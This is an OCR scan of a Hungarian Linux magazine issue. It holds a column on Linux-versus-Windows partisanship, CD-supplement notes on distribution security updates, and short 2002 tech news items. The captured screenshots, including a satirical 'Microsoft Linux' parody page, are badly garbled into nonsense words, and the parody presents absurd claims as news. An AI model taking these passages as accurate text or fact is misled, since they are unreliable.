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A Linux-Windows párharca 


iztos mindenki találkozott már a két , elkötelezett" fél 

összecsapásával. Azért tettem idézőjelbe az elkötelezett 

szót, mivel sajnálatos tapasztalatom szerint ezek az 
emberek csak a szájukat jártatják a másik rendszerrel kapcso- 
latban. Van egy ismerősöm, aki Microsoft rendszermérnöki 
képesítéssel rendelkezik, ami önmagában még nem jelentene 
bonyodalmat, azonban -— ugyan nem tudom, hogy a papírral 
jár-e, nekem ugyanis nincs ilyenem - a tudása csak erre a 
rendszerre korlátozódik. Viccelődve meg szokta jegyezni, 
hogy szerinte a Linux valójában ilyen és olyan — gondolom, 
mindenki el tudja képzelni, mit is szokott ilyenkor mondani. 
Ezzel nem is lenne nagy baj, ha egyszer-kétszer elviccelőd- 
nénk egymás rendszerén, de hogy két óra alatt körülbelül 
tizenötször ugyanaz a gyenge eresztésű poént zsolozsmázza 
a fülembe, nos kérem, ez már kicsit sok! Történt egyszer, 
hogy nyomtatgattam az otthoni gépemen, és megjelent a ked- 
ves ismerősöm. Éppen azzal a nehézséggel küzdöttem, hogy 
mivel a nyomtatóm memóriahibás, egyszerre csak három, 
esetleg öt oldalt szabad kiküldeni rá, egyébként hibaüzenettel 
leáll. Na, hozzáértő emberünk elmondta, hogy le kellene már 
tölteni egy jobb meghajtóprogramot, mert szerinte biztosan 
a meghajtó a hibás. Hiába állítottam, hogy a nyomtató a me- 
móriahibás, csak mondta a magáét. Na, gondoltam, most em- 
beredre akadtál, hapsikám: felajánlottam neki, hogyha ,a 
Linux ilyen gyenge, hogy még egy ilyen nyomtatót sem tud 
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Microsoft 
i . i i i Microsoft. s plan to kadbs ctiba and overthrow the governraent has succeeded. One Microsoft 
M S Linux: Shipping im official said Its a win-win situation. The US örédditsmegememezép shurts up the DOJ while 

Microsoft institxtes a monopoly within Cciba for everything frora computer software to VEN 
November 2002 Paper. One raore step closer to world dornination. Heck, we could feed a whole 1. 
department for the cost of one developer s salary in the US. kér not. knowhow to áms an 
Opexating Systera vegy well, bert neíthez do ött US developezs 


Microsoft Monkey Colony on 
Miczosofthas TaeATTl ET pe GE monkgys will be shot into space in 2005 to establish the 
Microsoft Linux provides all first Martian Colony. At a recent press conference, Bill Gates confizrned, "We are already 
the power of the Linux taaining the monkeys to do sinaple tasks like reboot the space ship when it blue screens. The space 
Operating System with the ÉR "willbe ou newest product, SpacePod. 2004. This product will instruct the 
Pp gyi xmning P P 
case of use youlve come to how to colonize Mars and establish trade with the Martians . We intend to rnonopolize 
k this marketbefore Huroan txavel to Mars ís possible." 
expect from Microsoft 
ERtlntké: MS Linux to have Start Button 
Microsoft is working to incorporate the well known "Start" button frorn the Windows Platforra 
Microsoft Linux brings a new into X Windows" Gnorne interface. "We just carvt figure out how the hell to get that dazn foot out 
level of productivity to Linux, of there! The daran thing is like stuck." The tearawill have this featucte ready by product launch. 
without sacrificing flexibility, performance, and 
control. In addition to features like My Home 
Directory and My Configuration, Microsoft Linux 
contains greatly improved support for Web and 
Enterprise development. 
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MS Linux Faces C. 

Miczrosofthas hired lawyers to attack its ownproduct line in an ati t. to conftse the DOJ. This 
stumning new tactic shows great prornise accon. to several Harvard Lawprofessors, although 

taany expressed confusion when gwestioned aborrt the long term effects of this carapaign. 

Windows Media Technologies More News ... 

With Microsoft Linux Enterprise Edition, you can 

create scalable multi-tier applications using our new 

fölnálásékÜtssákálléssz ásták ütés ösátnáláén 
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Linuxis a free Unix-type operating system originally Roderick Smiths Advanced Lirtx 
created by Linus Torvalds with the assistance of Jángis a must read if you want 
developers around the world. Developed underthe GNU — leam how to take advantage of all 
ic the source code for Linux is Linux has to offer as a networking 
freely available to everyone. Click on the link below to find tool. It takes an honest and 
out more about the operating system that is causing a straight-forward approach to showing 
revolution in the world of coraputers. you how to deal with the major 
networking and administration tasks, 
like configuring a firewall, running a 
web server, processing erasil, sharing files as well as 
etet our sign s ls el login to the see t0 many others. If yould like more information about the book, 
rnake it easier for our registered users to access our site read a review morD 
and to modify their personal information. If youre having ti cenread SEEN ÉTÉ EGT 
op Five Limux Books: 
problems signing up or logging in, please send a mail to 
webmaster (at) tnux.org and well help you get them 
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megfelelően kezelni", akkor menjünk el hozzád, töltsünk le 
az Internetről a meghajtót a nyomtatóhoz, telepítsük fel, majd 
nyomtassuk ki mind a 150 oldalt, mindjárt két példányban, 
hogy neked is maradjon egy. 

Nos, el is indultunk, meg is érkeztünk, csatlakoztattuk a nyom- 
tatót az ő gépéhez, fel is telepítettük a frissen letöltött window- 
sos meghajtóprogramot, és láss csodát! az első három oldal 
kinyomtatása után a nyomtató Error krixkrax-szal (én is 
mindig valami ehhez hasonló hibaüzenetet kaptam) leállt. 
Mosoly fagyott, de a legszebb nem ez volt, hanem az, hogy a 
Windows is a mosollyal együtt vált gyorsfagyasztott áruvá". 

Ez a fentebbi kis történet nem egymás becsmérlését szolgálja. 
Egyszerűen egy történetet osztottam meg Önökkel, amellyel 
azt kívántam érzékeltetni, milyen is az, ha az ember nem ért 
valamihez, mégis azt hiszi, hogy ,nagyon tudja". Szóljon ez 

a kis történet a linuxos társadalomhoz is: ne köpködjük a 
másik rendszert, mindig akad, aki azt szereti, vagy egyszerűen 
csak lusta áttérni más rendszerre. Azért azt sem tagadhatjuk 
le, hogy sajnos a Linux egyelőre még nem tud minden fela- 
datot hiánytalanul ellátni. 


Csontos Gyula 
(Csontos.Gyulaolinuxvilag.hu) 

a Linuxvilág szakmai és CD-szerkesztője. 
Szabadidejében szívesen mászik hegyet 
és kerékpározik. 





Tanulságul néhány fórum címe: 


, Szerintem a Windows jobb, mint a Linux" 

s MUD. MOTUM nee hutorumegi has tet 90311 eléüd- 1064 

2 http://wwvw.computing.net/linux/wvwwboard/forum/ 
14647.html 

a MUD. /torumá melee hütoruméegi az tát T001716v— 120 

2 http:/Awwwv.linuxforum.hu/modules.php?op-— 
modloadáname-XForumafile-viewthreadatid —251 
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Programvadászat 
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lőző számunkban felkértem kedves Olvasóinkat, hogy 
ötleteikkel támogassanak minket a CD-melléklet tartal- 
mának jobbátételében. Nem mondhatnám, hogy sok 
levelet kaptam, de legtöbben a frissítéseket hiányolták a koron- 
gokról. Így az ehavi CD-t a különböző Linux-változatok 
frissítései töltik meg. Mivel a SuSE Linux 8.0-hoz közreadtunk 
már egy hivatalos frissítő CD-t, ezen a korongon a Debian 
Woody, a Mandrake 8.2, 9.0 és a Red Hat 7.3, illetve 8.0 frissí- 
tései találhatóak meg. A mai világban általánosságban is 
elmondható, hogy a biztonsági frissítések alkalmazása, hasz- 
nálata nagyon fontos, szinte minden számítógép az Internet 
része, így elkerülhetetlen, hogy támadások (ha csak a próbál- 
kozás szintjén is) érik rendszerünket. Általánosságban elmond- 
ható, hogy az összes rendszerhez hamar megjelennek a bizton- 
sági frissítések — és ezek egy rendszer életében a legfontosab- 
bak. A hibák listáját az általunk használt kiadás honlapján 
találhatjuk meg (lásd a Kapcsolódó címek-nél). Csak ezután 
következhetnek a felhasználói programok kisebb-nagyobb 
hibáinak a javításai. 

Előző számunk korongjáról lemaradtak az OpenOffice.org 
irodai csomag magyarításához szükséges fájlok, ezért 

most pótoljuk. 





A legfrissebb fejlesztői rendszermag szintén felkerült a 
korongra, amely jelenleg a 2.5.41-es — mint látható, a feljesztés 
gőzerővel folyik. Olvasói javaslatokat továbbra is a 
cd(okiskapu.hu levélcímre várok. 
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Errata: Security Alerts, Bugfixes, and Enhancements 


Red Hat releaáses Errata ÁAlerts in three categories: Security Alerts, Bug Fix Alerts, and Enhancement 
Alerts, Each Errata Alert is comprised of a summary of the problem and the solution, including the RPM 
packages reguired to fix the problem, 


Important: Red Hats errata release policy supports the two most recent major product releases. All 


minor releases in the current product release cycle are supported as is the final release of the prior 
product release cycle, Currently supported products are indicated below, If you are using an 


unsupported product and reguire current software updates, please upgrade to a supported product, 


Red Hat Linux 7.3 (Valhalla) 
security alerts, bugfixes, enhancements 
Red Hat Linux 7.1 (Seawolf) 


Red Hat Linux 6.2 (Z000) 


Red Hat Linux 8.0 (Psyche) 
security alerts, bugfixes, enhancements 


Red Hat Linux 7.2 (Enigma) 
security alerts, bugfixes, enhancements 
Red Hat Linux 7.0 (Guinness) 


Stronghold 3 


Search known issues 
or submit a new bug in 
the Red Hat bug 
tracking system, 

, 


Red Hat Ent 
Vendor 


e Edition 
fic Errata 
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Secure Web Server 
version 3.x, version 2.0, version 1.0 


Kapcsolódó címek 


5 http:/Avww.debian.org/security/ 

2 http://www.redhat.com/apps/support/errata/index.html 
2 http:/Avwwv.linux-mandrake.com/en/security/ 

2 http:/Avww.mandrakesecure.net/en/ 
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lermészetesen helyet kaptak a korongon 
a cikkekhez tartozó programok, képek és 

programozási listák. Ezek közül, azt hiszem, a kisvállakozások 
számára legérdekesebb programok a Magazin/Szamlazok 
könyvtárban kaptak helyet. Ide három kipróbálható linuxos 
számlázóprogram került (különböző megszorításokkal), a róluk 
szóló cikk a 74. oldalon kezdődik, ahol a programokhoz 
telepítési útmutatót is kapunk. A GCC-ről szóló cikkünkhöz 
(49. oldal) is sok hasznos anyag tartozik, amit a Magazin/GCC 
könytárban találhatnak meg. Itt szerepel a cikkben szereplő 
példaprogramok forráskódja, lefordított állományaik, és 
bőséges leírás a GCC-hez. A talán legnépszerűbb rovat Marcel 
Gagné Fogadó a Linuxhoz programjai, a hozzá tartozó részeket 
a Magazin/Fogado könyvtárba helyeztük el. A legtöbb vissza- 
jelzés ezekkel a programokkal kapcsolatban érkezik, mindenki 
szereti kipróbálni ezeket a mütyürkéket. Ehhez Marcel kiadós 
segítséget is nyújt, lépésről lépésre vezetve végig mindenkit a 
programok telepítésén. 


Kellemes szórakozást! 


Csontos Gyula 

(Csontos. Gyulaolinuxvilag.hu) a Linuxvilág 
szakmai és CD-szerkesztője. Szabadidejében 
szívesen mászik hegyet és kerékpározik. 
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Páncélozott szépség 

Hordozható gép vásárlásakor mindig 
érdemes egy pillantást vetni a Panasonic 
modelljeire. A cégnél hagyomány a 
nagy átlagnál jóval időtállóbb, nem egy 
esetben katonai minősítést is elnyert 
vagy éppen vízálló modellek gyártása. 


A legújabb Ioughbook modell belseje 


nem mondható lenyűgözőnek, hiszen 

a 800 MHz-es Pentium III processzor, a 
128 MB memória és a 20 GB kapacitású 
merevlemez ma már szinte elavultnak 
számít. Sokkal érdekesebb a gép külseje, 
amely roppant erős, a korábbiaknál 
negyven százalékkal könnyebb magné- 
ziumötvözetből készült. Fémből készült 
szegélyek védik a gép ugyancsak csök- 
kentett súlyú LCD-jét, a kijelzőt tartó 
rozsdamentes acélcsuklók pedig azt 
hivatottak garantálni, hogy a gép fedele 
többezer felnyitás-lecsukás után is kifo- 
gástalanul és biztosan illeszkedjék a 
helyére. A mindössze egy kilogrammos 
gép fontos jellemzője akár hat órát is 
elérő üzemideje, ami - figyelem! — ele- 
gendő ahhoz, hogy akár egy repülőutat 
is kihúzzunk vele; illetve a repülőgépek 
lehajtható tálcáinak nagyságához iga- 
zodó mérete. Az új loughbook megjele- 
nésével sem hozza zavarba tulajdonosát, 
és 500 ezer forint körüli ára is elérhető- 
nek számít. 

2 http:/www.panasonic.com/toughbook 


Nagytesó itt is, ott Is 

Lapzártakor még nem zárult le a ma- 
gyar Nagy lestvér-díj szavazása, de 
már látható, hogy a csekély számú - és 
éppen ezért nem reprezentatív mintát 


MEGFIGYELE o BITGAWAROS. nu 
alkotó, mondanák a statisztikusok — sza- 
vazó haragja elsősorban kik ellen irá- 
nyul. Szokás szerint több érmet is be- 
gyűjtött a Microsoft, de előkelő helyre 
került a Big Brother című műsor és pro- 
ducere, valamint megdöbbentő módon 
Péterfalvi Attila adatvédelmi biztos is. 
2 http:/www.hu.bigbrotherawards.org 
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W3C-iroda nyílt Magyarországon 

Az MIA-SZTAKI mint hálózati és számí- 
tógépes megoldásokat fejlesztő szerve- 
zet 1995 óta tagja a W3C-nek. A hálózati 
protokollok és webes megoldások 


VV30 Pölkézátkánbbá 





Magyar Iroda 


kidolgozásával foglalkozó tömörülés vi- 
lágszerte több száz érdekeltet fog össze. 
A magyarországi iroda kettős szerepet 
játszik: egyrészt gondoskodik a hazai 
érdeklődők magyar nyelvű tájékoztatá- 
sáról, másrészt kiterjedt gazdasági, álla- 
mi és társadalmi kapcsolatai révén képes 
a magyar szakembereket és érdekeket 
képviselni a szervezetben. A W3C legkö- 
zelebbi irodája Ausztriában van, más 
közép-kelet európai országban még nem 
rendelkezik képviselettel. 

2 http:/www.w3c.hu 


Szupergépet épít a Linux NetworX 

A Linux NetworX bejelentette, hogy 
megbízást kapott egy 1024 processzorból 
álló, 10 teraFlop teljesítményű linuxos 
szuperszámítógép építésére az amerikai 
Los Alamos Nemzeti Laboratórium 
számára. A monstrum elkészülte után 





a világ öt legnagyobb teljesítményű gé- 
pe közé sorolódik majd, és az amerikai 
nukleáris arzenál kezelésében fog segéd- 
kezni. A szupergép a világ legnagyobb 
LinuxBIOS-alapú és lemeznélküli gépte- 
lepe lesz. A sok más hozzájáruló mellett 
a Los Alamos és a Linux NetworX köz- 
reműködésével fejlesztett, nyílt BIOS- 
helyettesítő révén könnyebbé válik a 
fürtök felügyelete, telepítése és bővítése. 
Mivel a csomópontok lemez nélkül fut- 
nak majd, eggyel kevesebb alkatrész 
meghibásodása jöhet szóba, így jelentő- 
sen növekedik a rendszer megbízható- 
sága. A mostani telepítés részben kísér- 
leti tervezetként szolgál, az építése során 
szerzett tapasztalatokat további — sajnos 
célterületüket tekintve is — hasonló gé- 
pek tervezésekor is felhasználják majd. 
2 http/wwwi.lnxi.com/newsllanl info.php 
2 http:/www.linuxnetworx.com 





Mindentudás egyeteme 
Szeptember közepétől 52 héten át neves 
tudósok tartanak egy-egy közérthető 
előadást szakterületük legfrissebb tudo- 
mányos ismereteiről a budapesti Műsza- 
ki és Gazdaságtudományi Egyetem 
informatikai épületében. A Minden- 
tudás Egyeteme a Matáv és a Magyar 
Tudományos Akadémia együttműkö- 
désének keretében, 
a Matáv és az Axe- 
lero támogatásával, 
francia és angolszász 
minta alapján való- 
sul meg. A díjtalanul látogatható progra- 
mokat tömörített formában a közszol- 
gálati televízió- és rádióadók felvételről 
sugározzák, és az előadások anyaga az 
Interneten is elérhető. A program célja 
áttekinteni és az érdeklődő közönség 
számára hozzáférhetővé tenni napjaink 
természet- és társadalomtudományának 
legmagasabb szintű ismereteit. 
2 http:/origo.hu/mindentudasegyeteme 
/index.html 


Kodak-Sanyo szerves kijelző 

A Kodak és a Sanyo a CEATEC JAPAN 
vásáron mutatta be közös fejlesztésű, 
szerves fénykibocsátó diódákat (OLED) 
használó, 15"-os kijelzője kísérleti 
példányát. Az aktív mátrixos kijelző 
1280 x720-as, azaz HDIV felbontásra 
képes, látható felülete 326x18,3 cm, 
fényereje pedig a jelenleg kapható 
legjobb LCD-kével vetekszik. A szerves 
diódákból felépülő kijelző képélessége 
kiváló, láthatósági szöge pedig 165 fok. 
Válaszideje rövid, színei pedig teltek, 
így televíziózásra és számítógépes mun- 
kára egyaránt alkalmas. Eleinte várha- 
tóan kisebb készülékekben, például 
zsebtitkárokban, kamerákban vagy hor- 
dozható szórakoztatóelektronikai készü- 
lékekben találkozhatunk majd ilyen 
megjelenítőkkel. 


Erkezik az nkorce2 

Már megkezdték az nVidia 
új, nForce2 lapkakészletének 
gyártását, és hamarosan 

- várhatóan még ebben a hónapban -— 
megjelennek a rá épülő, az AMD leg- 
újabb processzoraihoz ajánlott alaplapok 
is. Az új lapkák az elérhető legkorsze- 
rűbbek közé sorolandók, hiszen támo- 
gatják a DDR400 memóriák használatát, 
333 MHz órajelű előoldali buszt használ- 
nak, és képesek a 8x AGP kártyák meg- 
hajtására. Miként elődjébe, úgy az új 
lapkakészletben is került egy — jelen 
esetben GeForce4 MX - 3D-vezérlő. 

2 http:/www.nvidia.com 








Feltörték a 64-bites 

AC5 titkosítású üzenetet 

Bő két hónapos késéssel jelentette be 

a distributed.net, hogy nyár közepén 
egy japán résztvevő megtalálta az RSA 
Labs által 
kiadott, 
64-bites 
RC5 eljá- 
rással tit- 
kosított 
üzenetet. 
A megfej- 
tést egy 
hiba foly- 
tán csak augusztusban fedezték fel, 
majd az RSA Labs-distributed.net- 
egyeztetések miatt tovább késett a beje- 
lentés. Minden résztvevőnek csak gratu- 
lálni tudok: bebizonyították, hogy öt év 
kimerítő kereséssel a véges számú kulcs 
közül megtalálható a megfelelő. A distri- 
buted.net nemrég szövetségre lépett a 
rákkutatási célokkal létrehozott, az Intel 
által is támogatott United Devices osz- 
tott hálózattal, így csak remélhetjük, 
hogy az RC5-72 kód teljesen hasztalan 
feltörése mellett valamilyen értelmes 
célra is fel tudják majd használni a háló- 
zat révén összefogott hatalmas számítási 
teljesítményt. 

2 http:/www.distributed.net 





indulhat a fejlesztés 

az x86-64 processzorokra 

Az AMD központjában tartott Develo- 
per Symposium alkalmából a cég 
linuxos fejlesztőkkel lépett szövetségre 
annak érdekében, hogy 
elősegítse a 64-bites számító- 
gépek, alkalmazások és ope- 
rációs rendszerek fejlesztését. 
A tanácskozás központi témája a Linux 
mellett a nyílt forrású eszköz- és prog- 
ramfejlesztés volt, valamint az AMD 
hamarosan megjelenő processzora. 
Mivel a 64-bites processzorok teljesít- 
ményét és az általuk megcímezhető 
memóriamennyiséget eleinte várhatóan 
csak kiszolgálókban lehet majd kihasz- 
nálni, a gyártó számára fontos fegyver- 
tényt jelenthet az éppen ezen a terü- 
leten erős Linux-közösség támogatása. 
Az AMD további tanácskozások ren- 
dezését is tervezi: október végén Frank- 
furtban, december elején pedig Kínában 
várják a fejlesztőket. 

Nemrég megjelentek a programozók 
számára készített, az x86-64 processzo- 
rokhoz való útmutatók is. Az öt kötetet 
bárki letöltheti vagy megrendelheti, ha 
ellátogat a cég honlapjára. 

2 http:/www.amd.com 
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x86 alapra is lesz Solaris 9 

A Sun bevételeinek túlnyomó része a 
Sparc-alapú nagygépek értékesítéséből 
és támogatásából származik. Ennek 
ellenére 1995 óta a kisebb, x86-alapú 
gépekhez is beszerezhető a Solaris ope- 
rációs rendszer, amelyet 2000 óta ingye- 
nesen érhettek el az érdeklődők. 

A Solaris 9 megjelenésével azonban 
döntöttek, az x86-vonal fenntartása 
túlságosan költséges lenne. Ezt a hírt 
viszont érthető felháborodással fogadták 
azok a cégek, amelyek komolyan fog- 
lalkoztak a viszonylag olcsó Intel és 
AMD-alapú gépek és a Solaris összehá- 
zasításával. A tiltakozás hatásos volt, 

a Sun visszakozott, és januártól kezdve 
operációs rendszerét x86-os gépekre 

99 dolláros áron árulja. A próbaváltozat 
20 dollárért már most is beszerezhető, 
de ez csak jövő év elejéig működik. 
Támogatást úgyszintén fizetségért 
cserébe nyújt majd a cég. 

2 http:/www.sun.com 


Térhatású kijelzők még az idén 
Térhatású LCD-t mutatott be a Sharp. 
A cég hagyományosan vezető a kisebb- 
nagyobb képernyők területén, 1973-ban 
elsőként építettek tömegesen LCD-t 
elektronikus számológépekbe. Új 3D- 
kijelzőjük használatához nincs szük- 
ség különleges szemüvegre, a készülék 
egy hagyományos IFI LCD és egy 
szintén a Sharp által kifejlesztett , Swit- 
ching LCD" kijelzőt egyesít. Az utóbbi 
feladata az, hogy szabályozza a néző- 
höz jutó fény útját, akinek jobb és bal 
szeme így kismértékben eltérő képet 
fog látni, a két képből pedig egy régóta 
ismert elv alapján, az agy számára 
természetes úton áll elő a háromdi- 
menziós kép. A fényutakat szabályozó 
rács kikapcsolható, így a megjelenítő 
hagyományos, kétdimenziós kijelző- 
ként is használható. Az új kijelzők 
mérete 3,5" és 15" között változik, így 
mobil készülékekben, számítógépes 
kijelzőkben és kisebb televíziókban 
egyaránt találkozhatunk majd vele 

— akár ez év végétől. 

Hasonló termékkel rukkolt elő a Sanyo 
is, ám méretét tekintve egészen 50-ig 
nyújtózkodva. A cég jövő év elején 
szeretne piacra dobni egy 3D-hatású, 
50"-os plazmakijelzőt. Érdekessége, 
hogy a Sharp termékével ellentétben 
nemcsak egy ember számára lesz élvez- 
hető a képe, hanem széles láthatósági 
szögének köszönhetően akár négyen 

is helyet foglalhatnak előtte. 

2 http:/sharp-world.com 
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Lindows0$ 2.0 


Túlzás volna azt állítani, hogy a 
LindowsOS áttörő sikereket ért volna 

el, ám a fejlesztők kedvét a jelek szerint 
ez nem vette el. Sajnos a cég — volna öt- 
letem, hogy milyen megfontolásból - re- 
mekül titkolja, hogy pontosan miféle 
fejlesztéseket végeztek, annyit azonban 





sikerült kiderítenem, hogy a rendszert 
új, megszépült és könnyebben használ- 
ható felhasználói felülettel látták el, 
valamint említik a vezeték nélküli háló- 
zati kártyák és a Microsoft fájlkiszolgá- 
lók egyszerű használatát. A LindowsOS 
3.0-s változatára sem kell sokat várni, 
még ebben az évben megjelenik. A cég- 
nél tárt karokkal várják a rendszerépí- 
tőket is, akik az operációs rendszert havi 
átalánydíj ellenében telepíthetik az álta- 
luk összeállított gépekre. 

2 http:/www.lindows.com 


Térhangzás egyetlen hangsugárzóval 
A Pioneer PDSP-I1 jelzéssel bejelentette 
a világ első digitális hangprojektorát, 
amely egyetlen hangforrással 5.1, 6.1 
vagy 7.1 térhangzást képes elérni, még- 
hozzá akár 500 wattos teljesítménnyel. 
A jelenleg kap- 
ható hangrend- 
szerek öt vagy 
több hangszóró- 
ból állnak, ame- 
lyeket a hallga- 
tóságot befogadó 
szoba sarkaiba 
kellett elhelyezni 
— csakhogy ez 
rengeteg kábe- 
lezési és egyéb bajjal jár. A Pioneer 
hangszórója ezzel szemben egyetlen 
forrásból, 254 darab apró hangszóró 
segítségével vetíti a hangokat a szoba 
különböző pontjaira, amelyek a falakról 
és a mennyezetről visszaverődve kelte- 
nek térhatást a hallgatóban. A jövőre 
már beszerezhető készülék gyönyörűen 
illik egy nagyobbfajta plazmatévé alá, 
és mivel a dekódolást is maga végzi, 
közvetlenül csatlakoztatható a DVD- 
vagy CD-lejátszóhoz. 

2 http:/www.1Ilimited.com 
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Robot lohol a nyomodban. . . 
A japán Secom olyan robotot mutatott 
be, amely mozgó páncélszekrényként 
használható. A súlyos, 380 kg-os és meg- 
lehetősen méretes gépezet képes arra, 
hogy felismerje az 
emberek hangját, és 
az erre felhatalma- 
zott személyek pa- 
rancsainak engedel- 
1  meskedjen, illetve 
hűségesen, az akadályokat önműködően 
kikerülve, akár lépcsőkön keresztül is 
kövesse őket. Saját akkumulátoraival 
4 km/órás sebessége tud tartani, ami 
nagyjából egy gyalogló emberének felel 
meg. Ha valamilyen támadás érné, riasz- 
tójeleket és füstöt bocsát ki, illetve áram- 
ütéssel védekezik, helyzetéről pedig fo- 
lyamatosan értesíti a központot. A robot 
fejlesztésekor az volt a cél, hogy a pénz- 
és értékszállítási feladatok alól felment- 
hessék az embereket, akik így kisebb 
eséllyel válnak támadás áldozatává. 
2 http:/www.secom.co.jp 


Hadonászik vagy egerészik? 

A Gyration új egere minden olyan tulaj- 
donságot egyesít, amiért manapság az 
igényesebb felhasz- 
nálók döglenek: optikai 
és vezeték nélküli, pon- 
tosabban harminc méteres 
hatótávval rendelkező rádiós összekötte- 
tést használ a számítógéppel. Ez azon- 
ban csak másodlagos ahhoz képest, 
hogy - hála a cég GyroPoint nevű meg- 
oldásának — az egeret a levegőben is 
lehet használni. Ennek főleg bemutatók 
közben veheti hasznát az előadó, aki az 
egérrel való bajlódás helyett teljes egé- 
szében a hallgatóság figyelmének meg- 
őrzésére összpontosíthat. A cég honlapja 
szerint az egér az átlagos rádiós példá- 
nyokhoz képest finomabb kurzormozga- 
tást tesz lehetővé, mivel összeköttetése 
jóval gyorsabb a megszokottnál. A fur- 
csa eszköz három ceruzaakkumulátor- 
ral is csak 150 gramm, a hozzá kapott 
Gyrolools alkalmazással pedig akár 
nyolcvan, kifejezetten bemutatókhoz 
szánt hatást el lehet érni. Az USB felüle- 
tű, egyszerre akár nyolc egeret is bizton- 
ságosan kezelni képes vevőegységhez 
Windows-alapú, illetve Macintosh 
gépekhez jár illesztőprogram. 

2 http:/www.gyration.com 





Közös Matsushita—Toshiba 
képcsógyártás 

A Matsushita és a loshiba közös, a 
továbbiakban mindkét cég katódsu- 
gárcsöves képernyőgyártását átvevő 





leányvállalatot hoz létre. A tervek 
szerint az új vállalat, amelynek neve 
egyelőre ismeretlen, és amely a maga 
területén a világon a harmadik leg- 
nagyobb lesz, már a jövő év elején 
megkezdi működését. Ugyan az LCD 
és plazmakijelzők egyre inkább teret 
nyernek, a hagyományos képcsövek- 
nek sem áldozott még le: minden 
évben 2-3 százalékkal többet adnak el 
belőlük. A képcsöves televíziók és 
monitorok képe ugyanis a lendületes 
LCD-fejlesztések ellenére még mindig 
teltebb, kontrasztosabb és a színeket is 
az emberi szem számára kellemesebb 
árnyalatban jelenítik meg. Az új cég 
átveszi a ,szülők" vonatkozó fejlesztési 
erőforrásait is, és rövid időn belül meg- 
próbálja megszerezni szakterületének 
vezető helyét. 


Egér nélküli Dell gépek 

A Dell hamarosan egy újfajta navigációs 
eszközzel szállítja hordozható számító- 
gépeit. Az OTM Ilechnologies által fej- 
lesztett NaviLite megoldás az érintőpad 
vagy a hanyattegér helyettesítésére 
alkalmas nemcsak 
hordozható számító- 
gépeken, hanem 
gyakorlatilag bár- 
mely mobil eszkö- 
zön. A készülékbe, 
legyen az akár mobiltelefon, zsebtitkár 
vagy egyéb eszköz, egy apró, a szemre 
nézve ártalmatlan lézerdiódát, illetve 
egy hozzá tartozó érzékelőt építenek be. 
A felhasználónak meg sem kell érintenie 
a diódát, elég, ha fölétartja az ujját vagy 
például egy tollat, majd a megfelelő 
irányú mozgást végzi, lépkedhet a me- 
nüpontok, ikonok között, vagy mozgat- 
hatja az egérkurzort. Kattintani kétfé- 
leképpen tud: vagy az ujját közelíti 

az érzékelőhöz, vagy megnyomja azt. 

A NavilLite három dimenzióban tudja 
érzékelni a mozgást, amit játékoknál le- 
het a legjobban kihasználni. A NavilLite 
a fejlesztő állítása szerint pontos, gyors, 
a mozgásokat folyamatosan és fokozat- 
mentesen közvetíti a készüléknek. 

2 http:/www.otmtech.com 


Medgyesi Zoltán 

(mzarettesoft.hu) a BMGE 24 éves 
informatika szakos hallgatója. Szabad- 
idejét legszívesebben a barátnőjével 
tölti. Szeret autózni és bográcsban 
főzni. A Linuxot hat éve ismeri, de még 
nem volt lelkiereje, hogy áttérjen rá. 

A Linuxvilág magazin hírszerkesztője. 





. Láttuk-hallottuk — 


Cégvilág 


HP-sajtóreggeli 

A Hewlett-Packard bemutatta nagyvállalati hálózati adat- 
tárolási szerkezetét, az ENSA új nemzedékbeli, tovább- 
fejlesztett változatát, az ENSAextendedet. A vállalat kép- 
viselői bejelentették az új HP ProLiant ML300 kiszolgá- 
lókat, a HP StorageWorks szalagos könyvtárakat és le- 
mezes háttértárrendszereket, illetve az ENSAextended 
gyakorlati megvalósítását lehetővé tevő háttértár-virtua- 
lizációs programmegoldásokat is. 

2 http:/Awvww.hp.hu/sajto/hir.hp?id— 245 


Bővülő MailBox-szolgáltatások 
Új szolgáltatással gazdagodott a MailBox ingyenes leve- 
lezőrendszer: a levelek érkezéséről a felhasználók SMS- 
ben is értesülhetnek. A megoldás érdekessége, hogy az 
m ailboxá egyes értesítések mellett összesítő 
üzenet Is rendelhető, ilyenkor a rend- 
szer meghatározott időpontban a beérkezett leveleknek 
csak a darabszámát közli a felhasználóval. Az üzenetek 
díját a végfelhasználók értéknövelt SMS-eken keresztül 
fizetik. A szolgáltatást — az eddigi gyakorlattal ellentét- 
ben — az előre fizetett kártyával rendelkezők is igénybe 
vehetik. Az üzenetküldés egyelőre a Pannon GSM és a 
Westel hálózatába működik, de hamarosan várható a 
Vodafone és — a nemrég indított vezetékes SMS-küldési 
lehetőségnek köszönhetően -— a Matáv ügyfelek 
bekapcsolása is. 
2 http://www.mailbox.hu 


OTP-Westel: Mobilbank szolgáltatás 

A Westel és az OTP Bank SMS-alapú Mobilbank szolgál- 
tatást indított. Segítségével a legáltalánosabb banki 
műveleteket — átutalás, egyenleg lekérdezése, kártya- 
fedezet biztosítása, betétlekötés — végezhetjük el mobil- 
telefonról. A szolgáltatás használatához egy különleges 
SIM-kártyára van szükség, amely tartalmazza a Mobil- 
bank alkalmazást. A szolgáltatás havidíjas, használatá- 
hoz külön szerződést kell kötni a bankkal, ám ezután akár 
öt számla kezelését is lehetővé teszi. A banki műveletek 
adatait természetesen biztonságos módon továbbítják 

a hálózaton keresztül. 


Önkormányzati portálok a HP, a 
MatávCom és a Geoview kivitelezésében 
A MatávCom Kft., a Hewlett-Packard Magyarország 
Kft. és a Geoview Systems Kft. által alapított szövetség 
az előszerződések alapján közel 170 önkormányzatnak, 
közöttük legalább tíz nagyvárosnak építi ki a G2 portál- 
rendszer megoldásra alapozott önkormányzati portálját. 
A portálok október közepén, még az önkormányzati 
választások előtt elindulnak, és többek között a helyi 
lakosság és a vállalkozások jobb tájékoztatását, a 
gyorsabb ügyintézést szolgálják majd. Az Informatikai 
és Hírközlési Minisztérium (IHM) jogelődje, az Infor- 
matikai Kormánybiztosság (IKB) által kiírt , Önkormány- 
zatok internetes aktivitását biztosító eszközök és szol- 
gáltatások támogatása" című pályázat keretein belül 
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közel 420 települési és városi önkormányzatnak nyílik 
lehetősége arra, hogy egységes rendszerre és szol- 
gáltatásra épülő, mégis testreszabott portált alakítson 
ki, illetve a portál működtetéséhez szükséges informa- 
tikai eszközöket szerezzen be. Mivel a portálrendszer 
egy adatközpontban kerül elhelyezésre, az önkormány- 
zatok részéről portáljuk működtetése csekély többlet- 
munkával jár. A portálrendszer XML-alapú, önműködő, 
távolról is könnyen karbantartható, biztonságos, az 
Európai Unió normáinak is minden szempontból meg- 
felelő megoldás. 


2003 - Neumann-év 

A jövőre meghirdetett Neumann-évben az informatiká- 
